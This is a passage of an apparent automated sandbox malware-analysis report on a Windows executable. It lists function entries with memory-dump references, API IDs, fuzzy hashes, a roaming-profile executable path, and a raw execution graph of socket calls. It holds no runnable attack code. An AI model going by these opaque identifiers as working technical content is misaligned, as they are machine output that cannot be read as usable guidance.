                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E21F332708B4192E711AB54F8453EAB3A1FB98790F800136EA8D53659DF3CD259CB50
                                                                                                                                                                                                                                  Function 00007FF72C66C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                  • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                  • Instruction ID: 8b524a3827706a60c711ccd8df38208960b7ce08d737fe9669f057a6b4006148
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17D10672B08E8199E712DF65C8402AC77B3FB647A8B944239DE5E97B85DE3CD006CB50
                                                                                                                                                                                                                                  Function 00007FF72C66F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                                                                  • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                  • Instruction ID: e798a9ff5af1f77481553a2b50c57e67a3fc125e8c1208f250ac492d15c85b07
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F251F472F042118AFB15EB749D556BCB7A2FB64378FA00239DD1E52AE5DB3DA4028B10
                                                                                                                                                                                                                                  Function 00007FF72C66577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                                                                  • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                  • Instruction ID: 456a85463ffdc7f94a5d37425dee7b1e58438086be9ef758e12bc11d0159c845
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30518E22E046418AF711EF61D8513BDB7B2FB68B68F644539DB0947B88DF3CD4408B60
                                                                                                                                                                                                                                  Function 00007FF72C6520C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                                                                                  • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                  • Instruction ID: b2b7638f0be3dba353e948db6fc7c658ebe20f7f021b8a8a3537daf0698cbfa2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0211E931A0C14242F656A769ED4927A9353FFA47E0FD44030DB4907B8DCD2DD4D58A10
                                                                                                                                                                                                                                  Function 00007FF72C675B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                  • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                  • Instruction ID: 2c8d51917cfdedeef6d7a7d46cd1ee7869b08b06d17c0088ae84c53382110e74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1414912A0838242FB22AB259C52379E762FBA0BB4F944679EE5C07AD5DF3CD445CF10
                                                                                                                                                                                                                                  Function 00007FF72C669014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C669046
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: RtlFreeHeap.NTDLL(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72C65CBA5), ref: 00007FF72C669064
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                  • API String ID: 3580290477-4122129678
                                                                                                                                                                                                                                  • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                  • Instruction ID: f4feaf36a7a1201411cbf3947db74d7d10bf82483e76da0c7c89f30fbfe82c50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB417031A0860285EB1AAF219D401BCB3A6FF547A4BA54039ED4E47B85DE3DD481CB60
                                                                                                                                                                                                                                  Function 00007FF72C66CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                  • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                  • Instruction ID: 7c5b059ea10da6695cd57e5382a94c849e9edd373851d585ba448e8953ba70c0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD41E532718E8191DB219F25E8443A9B7A2FBA87A4F904135EE4D87788EF3CD401CB60
                                                                                                                                                                                                                                  Function 00007FF72C66F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                  • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                  • Instruction ID: e6e70bc9d0cd5a71794d595a94ef130351871ab5e2c65e8bef176cd5383bb8e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D821F562B0828185EB22AB11D84426DB3B3FBA8B54FE54039D64D83684CF7DE5448F62
                                                                                                                                                                                                                                  Function 00007FF72C65FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                  • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                  • Instruction ID: d52d067b7d8bfc96dad9dc48c807845a0d80928504ad2c331d0c2c5901975ec5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9112E32619B8182EB629F15E840269B7E5FB98B94F584630DB8D07758DF3DD5518B00
                                                                                                                                                                                                                                  Function 00007FF72C67073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                  • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                  • Instruction ID: de437b14411f05c41366f98addbcf7da6c64e9c8c915a142f4c2d4a1453642d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF01842191864385F722BF60986227EB7A1FFA8768FD01839D54D42685DF3CD5098F74

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:4.9%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:1.7%
                                                                                                                                                                                                                                  Total number of Nodes:1064
                                                                                                                                                                                                                                  Total number of Limit Nodes:99
                                                                                                                                                                                                                                  execution_graph 62419 7ffbaa495cf4 62422 7ffbaa495d2e 62419->62422 62421 7ffbaa495e2c 62450 7ffbaa4929f0 IsProcessorFeaturePresent capture_previous_context 62421->62450 62422->62421 62425 7ffbaa495e54 62422->62425 62424 7ffbaa495e40 62428 7ffbaa495e9e 62425->62428 62426 7ffbaa495ef3 62427 7ffbaa495f07 62426->62427 62430 7ffbaa4960c6 62426->62430 62442 7ffbaa49603a WSASocketW 62427->62442 62446 7ffbaa495f11 62427->62446 62428->62426 62429 7ffbaa49619e 62428->62429 62428->62446 62432 7ffbaa4961cd WSASocketW 62429->62432 62435 7ffbaa49611d getsockname 62430->62435 62430->62446 62434 7ffbaa4961fa 62432->62434 62433 7ffbaa495f43 62433->62421 62438 7ffbaa4960aa 62434->62438 62439 7ffbaa496078 62434->62439 62436 7ffbaa496134 62435->62436 62437 7ffbaa496140 62435->62437 62436->62438 62441 7ffbaa496160 getsockopt 62436->62441 62437->62439 62440 7ffbaa496149 WSAGetLastError 62437->62440 62453 7ffbaa494740 ioctlsocket WSAGetLastError 62438->62453 62452 7ffbaa494da4 WSAGetLastError 62439->62452 62440->62436 62440->62439 62441->62438 62441->62439 62445 7ffbaa496072 62442->62445 62445->62439 62448 7ffbaa496082 SetHandleInformation 62445->62448 62451 7ffbaa4929f0 IsProcessorFeaturePresent capture_previous_context 62446->62451 62447 7ffbaa49609c closesocket 62447->62446 62448->62438 62449 7ffbaa496094 62448->62449 62449->62446 62449->62447 62450->62424 62451->62433 62452->62446 62453->62449 62454 7ffbaa497174 62455 7ffbaa497187 62454->62455 62456 7ffbaa4971a4 62455->62456 62458 7ffbaa4949cc 62455->62458 62464 7ffbaa499568 62458->62464 62460 7ffbaa4949e6 ioctlsocket 62461 7ffbaa494a1c 62460->62461 62463 7ffbaa494a12 62460->62463 62462 7ffbaa494a22 WSAGetLastError 62461->62462 62462->62463 62463->62456 62465 7ffbaa49956f 62464->62465 62466 7ffbaa496ff4 62469 7ffbaa49702a 62466->62469 62467 7ffbaa49702e setsockopt 62472 7ffbaa4970f7 62467->62472 62469->62467 62470 7ffbaa4970b6 62469->62470 62471 7ffbaa497123 setsockopt 62470->62471 62470->62472 62471->62472 62473 7ffbaa496c34 62475 7ffbaa496c7c 62473->62475 62476 7ffbaa496c80 62475->62476 62477 7ffbaa4954ac 62475->62477 62478 7ffbaa4954e3 62477->62478 62480 7ffbaa495553 WSAGetLastError 62478->62480 62481 7ffbaa49555b WSAGetLastError 62478->62481 62482 7ffbaa49550b 62478->62482 62483 7ffbaa4955c8 WSAGetLastError 62478->62483 62484 7ffbaa4955c0 WSAGetLastError 62478->62484 62485 7ffbaa4955e8 WSAGetLastError 62478->62485 62489 7ffbaa49660c 62478->62489 62492 7ffbaa496bec 62478->62492 62495 7ffbaa4948b0 IsProcessorFeaturePresent select 62478->62495 62480->62481 62481->62478 62481->62482 62482->62475 62483->62478 62484->62483 62485->62478 62486 7ffbaa4955fd WSAGetLastError 62485->62486 62486->62478 62486->62482 62490 7ffbaa496630 recv 62489->62490 62491 7ffbaa496622 62489->62491 62490->62478 62491->62490 62493 7ffbaa496c10 send 62492->62493 62494 7ffbaa496c02 62492->62494 62493->62478 62494->62493 62495->62478 62496 7ffbaa4b81f4 62497 7ffbaa4b8225 00007FFBBB591A90 62496->62497 62500 7ffbaa4b8254 62496->62500 62497->62500 62498 7ffbaa4b8295 62500->62498 62501 7ffbaa4b9610 62500->62501 62503 7ffbaa4b9643 62501->62503 62502 7ffbaa4b9666 62502->62498 62503->62502 62505 7ffbaa4b7ff0 62503->62505 62506 7ffbaa4b802f 62505->62506 62509 7ffbaa4b8064 62506->62509 62511 7ffbaa4b836c 62506->62511 62508 7ffbaa4b8045 62508->62509 62510 7ffbaa4c4665 00007FFBAA5AD8D8 62508->62510 62509->62502 62510->62509 62514 7ffbaa4b83a7 62511->62514 62512 7ffbaa4b8463 62512->62508 62514->62512 62515 7ffbaa4b877c 62514->62515 62516 7ffbaa4b8797 62515->62516 62517 7ffbaa4b88b2 62516->62517 62519 7ffbaa4b90c0 62516->62519 62517->62514 62520 7ffbaa4b9102 62519->62520 62521 7ffbaa4b916f 62519->62521 62526 7ffbaa4b914b 62520->62526 62528 7ffbaa4b91cc 62520->62528 62522 7ffbaa4b91aa 62521->62522 62523 7ffbaa4b918c 62521->62523 62521->62526 62538 7ffbaa4c27a8 00007FFBC92DF020 62522->62538 62537 7ffbaa4b685c 00007FFBC92DF020 62523->62537 62526->62517 62533 7ffbaa4b923a 62528->62533 62530 7ffbaa4b9292 62532 7ffbaa4b93c1 62530->62532 62545 7ffbaa4c2eb0 IsProcessorFeaturePresent RtlLookupFunctionEntry capture_previous_context 62530->62545 62531 7ffbaa4b92a2 62531->62526 62532->62526 62533->62530 62539 7ffbaa4b5c58 62533->62539 62537->62520 62538->62526 62540 7ffbaa4b5c87 62539->62540 62541 7ffbaa4b5c82 62539->62541 62543 7ffbaa4b5d9f 62540->62543 62549 7ffbaa4b7848 62540->62549 62559 7ffbaa4b7a24 62541->62559 62543->62530 62546 7ffbaa4b7b7c 62543->62546 62545->62531 62547 7ffbaa4b7b84 62546->62547 62548 7ffbaa4b7b97 00007FFBC92DF020 62546->62548 62547->62548 62557 7ffbaa4b7885 62549->62557 62551 7ffbaa4b7928 62551->62543 62554 7ffbaa4b7916 62574 7ffbaa4c2eb0 IsProcessorFeaturePresent RtlLookupFunctionEntry capture_previous_context 62554->62574 62555 7ffbaa4c45a4 62556 7ffbaa4b7a24 00007FFBC92DF020 62555->62556 62558 7ffbaa4c45af 62556->62558 62557->62554 62568 7ffbaa4b79c4 62557->62568 62560 7ffbaa4b7a34 62559->62560 62561 7ffbaa4b7a3a 62559->62561 62560->62540 62562 7ffbaa4b7a76 62561->62562 62563 7ffbaa4b7a46 62561->62563 62564 7ffbaa4b7b7c 00007FFBC92DF020 62562->62564 62581 7ffbaa4b6b54 62563->62581 62584 7ffbaa4b6748 62563->62584 62589 7ffbaa4c2b68 62563->62589 62564->62560 62569 7ffbaa4b79e6 62568->62569 62570 7ffbaa4b79eb 62568->62570 62572 7ffbaa4b7a24 00007FFBC92DF020 62569->62572 62571 7ffbaa4b790c 62570->62571 62575 7ffbaa4b69e4 62570->62575 62571->62554 62571->62555 62572->62570 62574->62551 62577 7ffbaa4b6d48 62575->62577 62576 7ffbaa4b6eb3 62576->62571 62577->62576 62578 7ffbaa4b7b7c 00007FFBC92DF020 62577->62578 62580 7ffbaa4b6e46 62577->62580 62578->62580 62579 7ffbaa4b79c4 00007FFBC92DF020 62579->62576 62580->62576 62580->62579 62582 7ffbaa4b7a24 00007FFBC92DF020 62581->62582 62583 7ffbaa4b6b69 62582->62583 62585 7ffbaa4b7a24 00007FFBC92DF020 62584->62585 62586 7ffbaa4b6761 62585->62586 62587 7ffbaa4b7b7c 00007FFBC92DF020 62586->62587 62588 7ffbaa4b6770 62587->62588 62590 7ffbaa4b7a24 00007FFBC92DF020 62589->62590 62591 7ffbaa4c2b81 62590->62591 62592 7ffba66a9914 62594 7ffba66a9949 62592->62594 62593 7ffba66a9959 62594->62593 62596 7ffba66a9a00 62594->62596 62599 7ffba66a9a3d 62596->62599 62597 7ffba66a9a4e 62597->62593 62599->62597 62601 7ffba66a4c3c WSAGetLastError 62599->62601 62602 7ffba66a44e4 62599->62602 62601->62599 62603 7ffba66a4523 62602->62603 62606 7ffba66a4518 62602->62606 62608 7ffba66a2950 62603->62608 62605 7ffba66a45c3 62605->62599 62606->62603 62607 7ffba66a4594 select 62606->62607 62607->62603 62610 7ffba66a2959 62608->62610 62609 7ffba66a2964 62609->62605 62610->62609 62611 7ffba66a29a4 IsProcessorFeaturePresent 62610->62611 62612 7ffba66a29bc capture_previous_context 62611->62612 62612->62605 62613 7ffba4220350 